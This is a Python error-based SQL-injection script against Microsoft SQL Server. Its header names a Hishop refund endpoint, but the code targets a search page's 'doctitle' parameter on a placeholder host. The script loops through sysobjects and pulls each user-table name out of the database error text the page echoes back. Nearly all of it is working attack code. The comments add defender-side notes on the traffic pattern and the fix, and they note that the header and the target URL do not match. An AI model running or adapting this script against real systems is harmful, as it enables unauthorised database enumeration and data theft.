mssql-注入脚本

#coding:utf-8
#Author:LSA
#Description:hishop sqli for /user/UserRefundApply?OrderId=
#Date:20190701
import sys
import requests
from bs4 import BeautifulSoup
import re
# HTTP headers attached to every request the script sends. The Cookie value is
# blank in this listing; the User-Agent is a fixed desktop Chrome 75 string, so
# all requests from one run share the same UA in the web server's access log.
headers = {
    'Cookie': '',
    'User-Agent': (
        'Mozilla/5.0 (Windows NT 6.1; Win64; x64) '
        'AppleWebKit/537.36 (KHTML, like Gecko) '
        'Chrome/75.0.3770.100 Safari/537.36'
    ),
}

# Comma-separated list of single-quoted table names, spliced into the
# "name not in (...)" clause of the injected query. brute_tables() appends to
# it, so the list (and the request URL) grows by one name per iteration.
tables_name = "'XWCMFLOWACTION'"
def brute_tables(url):
    """Enumerate user-table names through the injectable ``doctitle`` parameter.

    Each of the 300 iterations sends one GET whose ``doctitle`` value closes the
    string literal and appends a sub-select of the first ``sysobjects`` row with
    ``xtype='u'`` whose name is not yet in ``tables_name``, compared with ``>0``.
    The first ``<p>`` of the response is read and the first single-quoted token
    in it is taken as the next table name -- presumably the quoted value inside
    the SQL Server conversion error the page echoes back (confirm against a
    sample response).

    The ``url`` argument is overwritten on the first iteration and never read.
    There is no stop condition: once the page stops returning a quoted token,
    ``quoted[0]`` raises IndexError and the run ends there.

    What this looks like from the server side: a burst of sequential GETs to
    /search/search.jsp from one client, each carrying ``sysobjects``,
    ``xtype='u'``, an ever-longer ``not in (...)`` list and a trailing ``--``
    in ``doctitle``. The technique depends on the parameter being concatenated
    into the query and on database error text reaching the response body;
    binding ``doctitle`` as a query parameter and returning a generic error
    page removes both.
    """
    # Declared up front; the function both reads and rebinds the module global.
    global tables_name

    # NOTE(review): the file header describes a different endpoint
    # (/user/UserRefundApply?OrderId=) than the URL actually built here.
    prefix = 'http://www.xxx.com/search/search.jsp?doctitle=100%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20('
    suffix = '))%3E0--'

    for _ in range(300):
        url = prefix + tables_name + suffix
        print(url)

        response = requests.get(url, headers=headers)
        first_para = BeautifulSoup(response.text, "lxml").p.text
        print(first_para)

        # Non-greedy match: every '...' token in the paragraph, in order.
        quoted = re.findall(r"'(.*?)'", first_para)
        print(quoted)
        print(quoted[0])

        # Add the new name to the exclusion list used by the next request.
        tables_name += ",'" + quoted[0] + "'"
        print(tables_name)
def main(url):
    """Entry wrapper: hand ``url`` straight to ``brute_tables`` and return nothing."""
    brute_tables(url)
if __name__ == '__main__':
    # Initial request URL with the starting exclusion list spliced in.
    # brute_tables() rebuilds the same string itself on every iteration, so
    # this value is passed through main() but not otherwise used.
    url = (
        'http://www.xxx.com/search/search.jsp?doctitle=100%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20('
        + tables_name
        + '))%3E0--'
    )
    main(url)

 
